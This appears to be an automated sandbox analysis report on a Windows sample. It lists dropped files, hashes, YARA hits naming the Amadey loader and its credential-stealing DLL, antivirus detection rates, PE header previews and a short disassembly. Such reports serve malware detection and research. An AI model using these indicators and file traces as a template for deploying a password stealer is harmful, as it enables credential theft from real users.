                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.5.4.6.4.5.4.4.2.9.1.1.0.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.5.4.6.4.5.4.6.7.9.1.0.9.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.0.8.9.e.4.6.-.b.1.6.0.-.4.1.a.6.-.9.8.3.4.-.b.5.2.2.1.c.e.d.e.6.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.4.5.c.e.2.e.-.2.c.5.d.-.4.8.0.4.-.b.4.a.f.-.f.d.0.5.1.0.0.b.e.d.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.F.6.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.2.0.-.0.0.0.1.-.0.0.1.f.-.5.c.7.5.-.7.c.c.8.7.1.0.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.3.f.0.1.9.6.9.b.2.7.5.4.4.4.2.2.2.3.b.5.1.b.f.7.8.e.5.d.4.4.6.0.0.0.0.f.f.f.f.!.0.0.0.0.8.e.b.0.c.7.d.0.2.f.c.8.a.a.6.b.6.c.5.a.7.c.7.1.e.a.6.0.b.c.3.3.3.a.a.3.d.1.c.7.!.8.F.6.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.1.2././.1.3.:.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Dec 14 04:09:04 2022, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):34894
                                              Entropy (8bit):2.098097190395399
                                              Encrypted:false
                                              SSDEEP:192:u2A9k2HFvOth7eZ1S6SRlmaRANO/4a08SdRLOEn:uZIthKD+4alMLOE
                                              MD5:57BB9A19DFFC3A30720BD4BC392CE63C
                                              SHA1:2841C2A5A4CA55248BAA12B03DDF45BF9A5E8080
                                              SHA-256:3B979F47F4E4CE93C4274A6ECB56FDD788156D662386482A1F7EB013B8A242B7
                                              SHA-512:27DADBE48BFE5F551A66C6A4B043ED16E33DB3272945BC36066DA3C0E54B32B393E9C0414A95DAAA8F5AF2234F02FE2539B51A9E71620F88A108659B68FB5ED2
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:MDMP....... .......`L.c....................................$...............T.......8...........T...............v}...........................................................................................U...........B......4.......GenuineIntelW...........T....... ...WL.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8332
                                              Entropy (8bit):3.6908615623175716
                                              Encrypted:false
                                              SSDEEP:192:Rrl7r3GLNi7+6z6YqJSUfDJgmfESP2Cpr389b+6sfSF9Km:RrlsNiy6z6Y0SU7JgmfESe+Zf0
                                              MD5:8C75001433EBA8F2FC9FF9E7B4184A9F
                                              SHA1:93424EAB7389399AAD4E1A19658AABA8E57920DC
                                              SHA-256:CC6E0DAD83E7E690B1490D293A1F41A66650FC633E2D4F708C92EF1CC87AA0D4
                                              SHA-512:E31F4013818DC7E9A48D35C069F90F295DD71D7E800497646FB7C9986AF3520B8DA78BB13251CA12116964CC0116021E1B9EB109867E4692098695B4F117C5E6
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.6.8.<./.P.i.d.>.......
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4622
                                              Entropy (8bit):4.413835149815752
                                              Encrypted:false
                                              SSDEEP:48:cvIwSD8zseJgtWI951Wgc8sqYj88fm8M4JHMYUFgq+q8vYMYiGxMzjzOd:uITfUSEgrsqYFJHncKYnnxKvOd
                                              MD5:8DDA398B6D27443E0F36BC858939DB98
                                              SHA1:91A75DE7B4D7A847C5056214FA0AEA7BEF84C419
                                              SHA-256:0136FD997E5CD393648033FFD1BCC76C162A7D76F210793D86695378D1EFDC7D
                                              SHA-512:36ED0CF0B4F0B0F61A200A499F2F28EEBDDB7BC42A91CC8D6FBA9CF59C568F11B9C3BDEECECD357FAEDE69161FEE9C5D1FD919D7AE8DE72C5CB1E8491AB82964
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1822399" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                              Process:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):129024
                                              Entropy (8bit):6.511616263388435
                                              Encrypted:false
                                              SSDEEP:3072:ox7pOYzBekcmWDWCMq6As523HeS9FAiZ87vO2rlL3Rne9:ox7ZNhc/dMq6AO0a7vVlT
                                              MD5:9995ABF2F401E4945A7D2930A3727619
                                              SHA1:7715E14AD6E4ADF609C62C5812419800343FBD4F
                                              SHA-256:D35B5DD18D91DBFE3DC89CB75B6A26757777B5C52A33CD8FCF6E5ED45A946F1A
                                              SHA-512:42726FB602958594914B5BC936AFF36833823F9F9DA9BC80A46579D96CEC12C7DF070C174EC9DD82C21F2FE44F1E9A4A2E50D9944FEA6379DBDEC666727A7EDA
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security
                                              • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Reputation:unknown
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......x.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\9545.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):249344
                                              Entropy (8bit):6.371571449774557
                                              Encrypted:false
                                              SSDEEP:6144:90Tn/MUTehRBZbSjpwe6N+6LzXFuz5a6EKhK6Kr3ZpO:yXg7Zb46FLBuz5aD46zO
                                              MD5:C6524CC2CB091E23BE6D9526D6BCBC99
                                              SHA1:8A1FC0333392DCD9FF664F64CE88D7ABDFD882DC
                                              SHA-256:37DE71B43236C63687B44F238A17CDE5F16BEA2B2EC8C29B0EA42B62DE947D6D
                                              SHA-512:FA7CEE2EBC9A445830505C078DBD870D809E1F829B202E75A6CE7C8BB728CE7CC68D6980EE0989FD6EE9DEF2DAA0C4EB67D8A462EB4F8583B20760FFC8DF13C6
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 53%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........XH..6...6...6...5...6...3.a.6...2...6.(.2...6.(.5...6.(.3...6...7...6...7.\.6.f.?...6.f.....6.f.4...6.Rich..6.........PE..L......c............................@.............@..........................0............@.....................................................................P)..._..p............................_..@...............\............................text...v........................... ..`.rdata..D...........................@..@.data...LD..........................@....rsrc...............................@..@.reloc..P).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                              Category:dropped
                                              Size (bytes):105976
                                              Entropy (8bit):7.9288617581895435
                                              Encrypted:false
                                              SSDEEP:1536:CYwlbiXP6ZT2fSPHA04D+fcBB0YugBbgaMiKmXaIjqZ73TCn1R73exu+jA9Ops8u:bwRiCpC+A04qcX0YfXVOxMtNFnSop
                                              MD5:AF9EDCF2AE7CA1F5DF3AB8FAEE735473
                                              SHA1:06218105DAA6BF86C04F0937C634E3C2C6B75A71
                                              SHA-256:02B2FE6FE005D6A31AABAC0E69BB44689B5F3918FBFB45A36BCE9E5838787FE8
                                              SHA-512:7F95A873B775494543F807A8CB0A4E29A0590235AC747D839EA3E0AB0322A8AC63E343040155999CFC7D9FF345456F4EF73CC84C650BDC4F825A75F160EF9227
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W......qco;.\..%r........H.'.|..)..m..e#..N.}5y._.pY\L.w[....r....%.......5...L..S....CN5b..6..>.... ZJ(......x+...4.../..[.#(b.NFs.Vu*F.y..*1rvG.K^.>._.?.....?.U..n...D>......g.a...F..U.#.h...>...Q...]...m...
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):559616
                                              Entropy (8bit):7.300452125448157
                                              Encrypted:false
                                              SSDEEP:12288:9Q43DNbQ6lAwyJLiAM/K+M11HTbcxk48KAGoX81Ca:9lbByJLijK+M19N48KZv
                                              MD5:46F30465FA693033E7D3D78468406C0C
                                              SHA1:8EB0C7D02FC8AA6B6C5A7C71EA60BC333AA3D1C7
                                              SHA-256:3775F0AA5B9D87F0237FF1249F5E8548EBA54F23EABCF62C199564E0966662E4
                                              SHA-512:CF6680239B2D94E5D878E3902D9368B6B52675C1A8C0C780B4F5737BADA268A4A954C15655039364F68B6081DCFC325C103DB03EB49521438987C75D415B1F24
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;.cU..cU..cU...V..cU...P..cU...Q..cU...Q..cU...V..cU...T..cU..cT..cU...P..cU...\..cU......cU...W..cU.Rich.cU.................PE..L......c............... ."...r......It.......@....@.......................................@.....................................<...............................4... ...............................`...@............@..8............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...px... ...l..................@....rsrc................l..............@..@.reloc..4............n..............@..B........................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):249344
                                              Entropy (8bit):6.371571449774557
                                              Encrypted:false
                                              SSDEEP:6144:90Tn/MUTehRBZbSjpwe6N+6LzXFuz5a6EKhK6Kr3ZpO:yXg7Zb46FLBuz5aD46zO
                                              MD5:C6524CC2CB091E23BE6D9526D6BCBC99
                                              SHA1:8A1FC0333392DCD9FF664F64CE88D7ABDFD882DC
                                              SHA-256:37DE71B43236C63687B44F238A17CDE5F16BEA2B2EC8C29B0EA42B62DE947D6D
                                              SHA-512:FA7CEE2EBC9A445830505C078DBD870D809E1F829B202E75A6CE7C8BB728CE7CC68D6980EE0989FD6EE9DEF2DAA0C4EB67D8A462EB4F8583B20760FFC8DF13C6
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\9545.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 53%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........XH..6...6...6...5...6...3.a.6...2...6.(.2...6.(.5...6.(.3...6...7...6...7.\.6.f.?...6.f.....6.f.4...6.Rich..6.........PE..L......c............................@.............@..........................0............@.....................................................................P)..._..p............................_..@...............\............................text...v........................... ..`.rdata..D...........................@..@.data...LD..........................@....rsrc...............................@..@.reloc..P).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):129024
                                              Entropy (8bit):6.511616263388435
                                              Encrypted:false
                                              SSDEEP:3072:ox7pOYzBekcmWDWCMq6As523HeS9FAiZ87vO2rlL3Rne9:ox7ZNhc/dMq6AO0a7vVlT
                                              MD5:9995ABF2F401E4945A7D2930A3727619
                                              SHA1:7715E14AD6E4ADF609C62C5812419800343FBD4F
                                              SHA-256:D35B5DD18D91DBFE3DC89CB75B6A26757777B5C52A33CD8FCF6E5ED45A946F1A
                                              SHA-512:42726FB602958594914B5BC936AFF36833823F9F9DA9BC80A46579D96CEC12C7DF070C174EC9DD82C21F2FE44F1E9A4A2E50D9944FEA6379DBDEC666727A7EDA
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Author: Joe Security
                                              • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Reputation:unknown
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......x.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):160970
                                              Entropy (8bit):7.998987236677346
                                              Encrypted:true
                                              SSDEEP:3072:ryKvP/FpzgLSFlw8Tsl0+NNr5+7Vp3NW21IrUu6d3O9dk5OaSZIVilFX4Kp46Afj:rXPLzCSLjTslhB5+7VgUu6MdaSZsAFXI
                                              MD5:12924AF0CE2C960BE50DE7A77879C2CC
                                              SHA1:83281053BE86A582D1A6591F1E596E437E32FCDE
                                              SHA-256:689BFCDCFF48E4EC3FF5660CC03913B6F45DA0622E8325EF3F3D75AFD2E343B0
                                              SHA-512:A7A0FCE274538DA72428D53CFEB593E2AE88ED0420E4D83E18FFF3561C41C9E5210AD9AC5AD27270473E6BD03F182D62218BFC5CB842937A5C554AB486DF4944
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:.....[D..qU.. :.=.P...$.T.3.K..+...AUh....w....Utk.....i..{.nU.S|.;.X......;.;?aS.!l.v....A..B....E%.cg.K.o....*.|.*@W.*...K...F.R*.&`.=.!.42<S..&..8..|.<....c....^....~.EG...IX..h...T..p...;gQ%K0WW...x..H9..0.I%.m...K..=..k..r.N=.....n.H..Ko.QNP5.$O..H`lZ.W3..K.......#....'D..W2....V."......u.(B.^0.P.6,^'1)u(.T.."....u...F..V...+J.j..,yM.Q..Op.....cx.C..u.Ih7.(..WFI....E.%..d..b......;%S....... .Y.%.3..Ow.2T..q.@.|..!..v..f... .s..E..x.....`..b...tv............*....'..X...Z..q#+.....*.@U.C{.........Mc.Q,...k!dv$E+8...........@..T.........97#.......PU.....3h.5*..*w....<<WQQ*.P.<.2.gO.....F...E.R..9e..G....z]...1....w....]...Mx,!......r!...oY[w.......i|{Y.Bq.O....9.....W.-lS......p. .Y...5d..@..r/Ug.........^.J...:.D...~...._.!..\...|._.~..x(..7$.,I)........i.p)..3..Yl.3C....B?8:...T{..'...I:.'>#.;.:p.&..T....~...l.......Y....Q-V...@?..\.4..~.:h...u[.L....Y.w..q...x.O.....@.F..3....-.sKD.^....9.u.Wo..zW).......,...@..........:..\$.I.>....;.._.
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):244736
                                              Entropy (8bit):6.678359541055903
                                              Encrypted:false
                                              SSDEEP:3072:0Rn60LZzxCCPaCK5T3cyT/KYtNMHO2R2NiruKiwNXJ2v40T2ui7lY6:mRL+CPaas/K02HOBNKnOv9T2lhY6
                                              MD5:C8782DA2928F63712D03D0EA36C57C3F
                                              SHA1:0D87BA5D17440501FE3629F56FEB0A9193D43B43
                                              SHA-256:A68B2D14B767DF5EDB784BC338C84E09D73AC90A75346A9FEDCE2B0163CA9656
                                              SHA-512:BDDF75CFBE80801F52CB4CAEBCA6E36569FABEBF99BB6AA702282B1E9423604D7C86A03CEE7F8FCA16A8DA521174530045E4C3CFACD34DE9306180B1D18291FF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 69%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$./.`.A.`.A.`.A.~...u.A.~.....A.G.:.c.A.`.@...A.~...A.A.~...a.A.~...a.A.Rich`.A.........PE..L...N`.a................."...`.......=.......@....@..........................................................................$..(....... ........................................................... (..@...............D............................text....!.......".................. ..`.data...H....@.......&..............@....rsrc... ............2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:unknown
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Windows\SysWOW64\cacls.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):15
                                              Entropy (8bit):3.240223928941852
                                              Encrypted:false
                                              SSDEEP:3:o3F:o1
                                              MD5:509B054634B6DE74F111C3E646BC80FD
                                              SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                              SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                              SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:processed dir:
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.678359541055903
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:kmxId0uLRn.exe
                                              File size:244736
                                              MD5:c8782da2928f63712d03d0ea36c57c3f
                                              SHA1:0d87ba5d17440501fe3629f56feb0a9193d43b43
                                              SHA256:a68b2d14b767df5edb784bc338c84e09d73ac90a75346a9fedce2b0163ca9656
                                              SHA512:bddf75cfbe80801f52cb4caebca6e36569fabebf99bb6aa702282b1e9423604d7c86a03cee7f8fca16a8da521174530045e4c3cfacd34de9306180b1d18291ff
                                              SSDEEP:3072:0Rn60LZzxCCPaCK5T3cyT/KYtNMHO2R2NiruKiwNXJ2v40T2ui7lY6:mRL+CPaas/K02HOBNKnOv9T2lhY6
                                              TLSH:DC34AD40BA93C462C291AD31CD69C6F1F739FDA599B6064F37187B3F6E303819622636
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$./.`.A.`.A.`.A.~...u.A.~.....A.G.:.c.A.`.@...A.~...A.A.~...a.A.~...a.A.Rich`.A.........PE..L...N`.a................."...`.....
                                              Icon Hash:beccae9eeea62aa2
                                              Entrypoint:0x403df6
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x611E604E [Thu Aug 19 13:44:46 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:e4727ec893dc979e33dd56cc7774fb31
                                              Instruction
                                              call 00007FF59867C275h
                                              jmp 00007FF598677A3Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              mov eax, dword ptr [ebp+08h]
                                              push esi
                                              mov esi, ecx
                                              mov byte ptr [esi+0Ch], 00000000h
                                              test eax, eax
                                              jne 00007FF598677C25h
                                              call 00007FF59867A76Dh
                                              mov dword ptr [esi+08h], eax
                                              mov ecx, dword ptr [eax+6Ch]
                                              mov dword ptr [esi], ecx
                                              mov ecx, dword ptr [eax+68h]
                                              mov dword ptr [esi+04h], ecx
                                              mov ecx, dword ptr [esi]
                                              cmp ecx, dword ptr [00424528h]
                                              je 00007FF598677BD4h
                                              mov ecx, dword ptr [00424444h]
                                              test dword ptr [eax+70h], ecx
                                              jne 00007FF598677BC9h
                                              call 00007FF59867CC94h
                                              mov dword ptr [esi], eax
                                              mov eax, dword ptr [esi+04h]
                                              cmp eax, dword ptr [00424348h]
                                              je 00007FF598677BD8h
                                              mov eax, dword ptr [esi+08h]
                                              mov ecx, dword ptr [00424444h]
                                              test dword ptr [eax+70h], ecx
                                              jne 00007FF598677BCAh
                                              call 00007FF59867C508h
                                              mov dword ptr [esi+04h], eax
                                              mov eax, dword ptr [esi+08h]
                                              test byte ptr [eax+70h], 00000002h
                                              jne 00007FF598677BD6h
                                              or dword ptr [eax+70h], 02h
                                              mov byte ptr [esi+0Ch], 00000001h
                                              jmp 00007FF598677BCCh
                                              mov ecx, dword ptr [eax]
                                              mov dword ptr [esi], ecx
                                              mov eax, dword ptr [eax+04h]
                                              mov dword ptr [esi+04h], eax
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 10h
                                              push esi
                                              push dword ptr [ebp+0Ch]
                                              lea ecx, dword ptr [ebp-10h]
                                              call 00007FF598677B2Ah
                                              mov esi, dword ptr [ebp+08h]
                                              movsx eax, byte ptr [esi]
                                              push eax
                                              call 00007FF59867CE37h
                                              cmp eax, 65h
                                              jmp 00007FF598677BCEh
                                              inc esi
                                              movzx eax, byte ptr [esi]
                                              push eax
                                              call 00007FF59867CCE5h
                                              test eax, eax
                                              pop ecx
                                              jne 00007FF598677BB3h
                                              movsx eax, byte ptr [esi]
                                              Programming Language:
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [C++] VS2008 build 21022
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1248c0x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x18920.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x12900x1c.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x28200x40.text
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x244.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x121c20x12200False0.526239224137931data6.287587198243143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .data0x140000x2bf480x10c00False0.9437383395522388data7.832296161196346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x400000x189200x18a00False0.5258565989847716data5.47809790236992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountry
                                              RT_CURSOR0x566680x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
                                              RT_CURSOR0x567980xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
                                              RT_CURSOR0x568880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
